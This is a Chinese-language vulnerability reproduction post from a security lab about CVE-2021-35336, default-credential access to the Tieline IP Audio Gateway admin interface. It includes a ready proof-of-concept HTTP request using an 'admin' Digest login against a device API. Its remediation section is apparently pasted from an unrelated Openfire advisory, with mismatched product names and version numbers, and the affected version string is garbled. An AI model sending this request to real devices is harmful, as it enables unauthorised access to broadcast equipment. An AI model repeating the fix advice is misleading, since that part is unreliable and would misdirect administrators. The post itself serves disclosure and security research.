网安引领时代,弥天点亮未来
IP Audio Gateway是Tieline的一个音频编解码器。
Tieline IP Audio Gateway存在访问控制错误漏洞,该漏洞源于Tieline Web Administrative Interface中的漏洞可能允许未经身份验证的用户使用高特权帐户访问系统的敏感部分。
直线IP音频网关2.6.4 8及以下受不正确的访问控制的影响。
1.访问漏洞环境
2.对漏洞进行复现
Poc
GET /api/get_device_details HTTP/1.1
Host:
Authorization: Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"
复现请求
响应
3.nuclei工具测试(漏洞存在)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
升级至安全版本4.6.8 或 4.7.5及以上
限制网络访问,切勿将 Openfire 管理控制台暴露于互联网,使用网络安全措施,确保只有受信任成员才能访问。
https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):Tieline IP Audio Gateway 访问控制错误漏洞(CVE-2021-35336)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论